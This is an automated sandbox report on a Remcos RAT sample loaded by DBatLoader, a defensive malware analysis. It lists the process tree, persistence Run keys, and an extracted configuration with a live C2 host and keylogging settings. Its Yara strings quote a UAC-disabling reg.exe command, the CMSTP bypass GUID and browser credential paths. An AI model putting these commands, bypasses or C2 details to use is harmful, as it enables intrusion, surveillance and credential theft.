Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
udVh4Ist4Z.exe

Overview

General Information

Sample name:udVh4Ist4Z.exe
renamed because original name is a hash value
Original sample name:2cc30d206669699e58870623365fef82.exe
Analysis ID:1430910
MD5:2cc30d206669699e58870623365fef82
SHA1:de5e70f094d0b72660aa57b87667edd9d52971fc
SHA256:42ac8e7e9df9877af1382f5626fd74e63210d307f6d577cd5b387ffd0c9520bd
Tags:32exetrojan
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Creates multiple autostart registry keys
Delayed program exit found
Drops PE files with a suspicious file extension
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • udVh4Ist4Z.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\udVh4Ist4Z.exe" MD5: 2CC30D206669699E58870623365FEF82)
    • cmd.exe (PID: 4972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\XjfxsfmnO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3516 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\udVh4Ist4Z.exe C:\\Users\\Public\\Libraries\\Xjfxsfmn.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • nmfsxfjX.pif (PID: 5000 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 3492 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Xjfxsfmn.PIF (PID: 4040 cmdline: "C:\Users\Public\Libraries\Xjfxsfmn.PIF" MD5: 2CC30D206669699E58870623365FEF82)
    • nmfsxfjX.pif (PID: 6400 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 2616 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 7008 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 3380 cmdline: "C:\ProgramData\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Xjfxsfmn.PIF (PID: 3708 cmdline: "C:\Users\Public\Libraries\Xjfxsfmn.PIF" MD5: 2CC30D206669699E58870623365FEF82)
    • nmfsxfjX.pif (PID: 2420 cmdline: C:\Users\Public\Libraries\nmfsxfjX.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • remcos.exe (PID: 5068 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • remcos.exe (PID: 5756 cmdline: "C:\Users\user\AppData\Roaming\Remcos\remcos.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "kenoss.duckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\XjfxsfmnO.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6c4b8:$a1: Remcos restarted by watchdog!
        • 0x6ca30:$a3: %02i:%02i:%02i:%03i
        00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          Click to see the 50 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          10.1.nmfsxfjX.pif.400000.3.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            10.1.nmfsxfjX.pif.400000.3.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              10.1.nmfsxfjX.pif.400000.3.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              10.1.nmfsxfjX.pif.400000.3.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              10.1.nmfsxfjX.pif.400000.3.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x6637c:$s1: CoGetObject
              • 0x66390:$s1: CoGetObject
              • 0x663ac:$s1: CoGetObject
              • 0x70338:$s1: CoGetObject
              • 0x6633c:$s2: Elevation:Administrator!new:
              Click to see the 30 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nmfsxfjX.pif, NewProcessName: C:\Users\Public\Libraries\nmfsxfjX.pif, OriginalFileName: C:\Users\Public\Libraries\nmfsxfjX.pif, ParentCommandLine: "C:\Users\user\Desktop\udVh4Ist4Z.exe", ParentImage: C:\Users\user\Desktop\udVh4Ist4Z.exe, ParentProcessId: 2056, ParentProcessName: udVh4Ist4Z.exe, ProcessCommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, ProcessName: nmfsxfjX.pif
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Xjfxsfmn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\udVh4Ist4Z.exe, ProcessId: 2056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xjfxsfmn
              Sigma detected: Suspicious Program Location with Network Connections
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 13.107.137.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\Xjfxsfmn.PIF, Initiated: true, ProcessId: 4040, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49715
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Xjfxsfmn.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\udVh4Ist4Z.exe, ProcessId: 2056, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Xjfxsfmn
              Sigma detected: Execution of Suspicious File Type Extension
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\nmfsxfjX.pif, NewProcessName: C:\Users\Public\Libraries\nmfsxfjX.pif, OriginalFileName: C:\Users\Public\Libraries\nmfsxfjX.pif, ParentCommandLine: "C:\Users\user\Desktop\udVh4Ist4Z.exe", ParentImage: C:\Users\user\Desktop\udVh4Ist4Z.exe, ParentProcessId: 2056, ParentProcessName: udVh4Ist4Z.exe, ProcessCommandLine: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, ProcessName: nmfsxfjX.pif
              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\ProgramData\Remcos\remcos.exe", EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\nmfsxfjX.pif, ProcessId: 5000, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-L24XL1

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
              Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
              Antivirus detection for dropped file
              Source: C:\Users\Public\Libraries\netutils.dllAvira: detection malicious, Label: TR/AVI.Agent.rqsyc
              Found malware configuration
              Source: 16.1.nmfsxfjX.pif.400000.1.unpackMalware Configuration Extractor: Remcos {"Version": "4.9.4 Pro", "Host:Port:Password": "kenoss.duckdns.org:1166:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-L24XL1", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFReversingLabs: Detection: 63%
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFVirustotal: Detection: 66%Perma Link
              Source: C:\Users\Public\Libraries\netutils.dllReversingLabs: Detection: 82%
              Source: C:\Users\Public\Libraries\netutils.dllVirustotal: Detection: 67%Perma Link
              Multi AV Scanner detection for submitted file
              Source: udVh4Ist4Z.exeReversingLabs: Detection: 63%
              Source: udVh4Ist4Z.exeVirustotal: Detection: 66%Perma Link
              Yara detected Remcos RAT
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR
              Machine Learning detection for dropped file
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: udVh4Ist4Z.exeJoe Sandbox ML: detected
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,6_1_00433837
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_1_00433837
              Source: udVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_8754e71a-3

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004074FD _wcslen,CoGetObject,6_1_004074FD
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004074FD _wcslen,CoGetObject,10_1_004074FD
              Source: udVh4Ist4Z.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: Binary string: easinvoker.pdbH source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014027000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134401693.0000000014E81000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, easinvoker.exe.0.dr
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D658CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0044E879 FindFirstFileExA,6_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040783C FindFirstFileW,FindNextFileW,6_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_1_00419AF5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 7_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,7_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 7_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,7_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0044E879 FindFirstFileExA,10_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0040783C FindFirstFileW,FindNextFileW,10_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,10_1_00419AF5
